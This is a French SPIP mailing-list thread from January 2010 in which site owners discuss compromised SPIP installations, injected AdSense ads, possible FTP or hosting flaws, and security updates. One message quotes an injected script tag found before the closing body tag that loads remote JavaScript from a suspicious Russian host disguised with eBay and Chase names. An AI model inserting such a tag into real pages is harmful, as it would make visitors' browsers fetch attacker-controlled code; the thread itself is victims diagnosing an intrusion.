eh bien il semble bien je sois victime du même problème, en regardant dans firebug le code généré, je viens de trouver cela tout en bas, juste avant le </body>
<script defer="defer" type="text/javascript" id="Nn3d53aljff" src="http://chase-com.ebay.fr.ebay-co-uk.carswebnet.ru:8080/google.com/google.com/allegro.pl/oricon.co.jp/getiton.com/"/></script>
qui nest évidemment pas de mon fait et qui n'apparait dans aucun de mes squelettes ni dans spip.php
mon spip est à jour, version 2.0.10, et j'ignore totalement si ce code était présent préalablement ni si cela provient vraiment de spip, ce site est hébergé sur un serveur dédié qui possède d'autres spip, peut être pas tous mis à jour (je vais prévenir l'admin de suite) et une attaque a été signalée sur ce serveur il y a une semaine, toutes les traces n'ont peut être pas été nettoyées.
Je ne peux pas filer le lien du site sur lequel je bosse pour éviter qu'il soit référencé avant d'être terminé, mais si quelqu'un veut en savoir plus, je peux envoyer l'adresse en mail privé,
cordialement,
troOn
Planète-éducation a écrit :
Bonjour,
La version de SPIP sur le serveur n’est peut-être pas à jour : http://www.spip-blog.net/Alerte-securite-SPIP-nouvelle.html
Au plaisir
Yves Duchesne
Conseiller pédagogique TIC
http://www.planete-education.com/recit/
http://robotique.planete-education.com/
http://semantice.planete-education.com/
etc.
Le 17 janvier 2010 19:13, Teddy Payet <teddy.spip@gmail.com <mailto:teddy.spip@gmail.com>> a écrit :
Bonjour,
Est-ce que ça ne serait pas plutôt euh qui aurait une faille de
sécurité dans leur système? Une faille ftp?
Car jusqu'à maintenant, je n'ai pas entendu parlé d'un problème de
ce genre chez SPIP... (Mais on n'est à l'abris de rien...)
Quel est le contenu du fichier spip.php piraté? De plus,
l'hébergeur devrait avoir des logs de tout cela. Connaître à quel
moment le fichier spip.php a été modifié entre autre... Cela
permettrait de mieux cerner le problème. Et s'ils ne sont pas
capables de répondre à cela, c'est qu'il y a anguille sous roche...
Le 18 janv. 10 à 01:00, William Pezet a écrit :
Bonjour,
c'est la deuxième fois que mon site se fait piraté.
Le piratage consiste à ajouter des pubs adsense sur dans le
fichier spip.php :[
Mon spip est à jour.
J'ai déclaré cela à google.
Mais j'aimerais savoir ce que je peux faire pour sécuriser mon site.
Mon hébergeur (trusttelecom) semble désigner spip comme la faille
et pense que cela provient de droit sur un fichier ou dossier.
qu'est ce que je peux faire?
-- William Pezet // Monsieur Pixel
Sites Internet / Multimédia / Formations
---------------------------------------------------------
web : www.monsieurpixel.com <http://www.monsieurpixel.com>
blog : blog.monsieurpixel.com <http://blog.monsieurpixel.com>
tel : 06 12 38 66 65
_______________________________________________
liste spip
spip@rezo.net <mailto:spip@rezo.net> - désabonnement : envoyer un
mail à spip-off@rezo.net <mailto:spip-off@rezo.net>
Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
Discuter chez rezo.net
Documentation de SPIP : http://www.spip.net/
Irc : de l'aide à toute heure : http://spip.net/irc
_______________________________________________
liste spip
spip@rezo.net <mailto:spip@rezo.net> - désabonnement : envoyer un
mail à spip-off@rezo.net <mailto:spip-off@rezo.net>
Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
Discuter chez rezo.net
Documentation de SPIP : http://www.spip.net/
Irc : de l'aide à toute heure : http://spip.net/irc
------------------------------------------------------------------------
_______________________________________________
liste spip
spip@rezo.net - désabonnement : envoyer un mail à spip-off@rezo.net
Infos et archives : http://listes.rezo.net/mailman/listinfo/spip
Discuter chez rezo.net
Documentation de SPIP : http://www.spip.net/
Irc : de l'aide à toute heure : http://spip.net/irc